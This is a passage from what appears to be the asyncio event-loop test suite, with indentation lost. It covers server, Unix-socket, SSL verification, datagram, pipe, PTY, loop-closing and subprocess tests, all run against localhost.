return self.loop.create_task(getaddrinfo(*args, **kwds))
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed afterwards to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@support.skip_unless_bind_unix_socket
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed afterwards to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed afterwards to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed afterwards to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = self.loop.create_future()
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def _test_create_datagram_endpoint(self, local_addr, family):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=local_addr, family=family)
s_transport, server = self.loop.run_until_complete(coro)
sockname = s_transport.get_extra_info('sockname')
host, port = socket.getnameinfo(
sockname, socket.NI_NUMERICHOST|socket.NI_NUMERICSERV)
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# the client received the 8-byte reply b'resp:xxx'
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint(self):
self._test_create_datagram_endpoint(('127.0.0.1', 0), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_ipv6(self):
self._test_create_datagram_endpoint(('::1', 0), socket.AF_INET6)
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
except:
pass
else:
break
else:
assert False, 'Cannot create socket.'
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = self.loop.create_task(main())
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
# The ideal number of calls is 12, but on some platforms the selector
# may sleep a little bit less than the timeout, depending on the resolution
# of the clock used by the kernel. Tolerate a few extra calls on
# these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = self.loop.create_future()
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on a closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
@unittest.skipUnderUwsgi()
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
@unittest.skipUnderUwsgi()
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
with self.assertWarns(DeprecationWarning):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
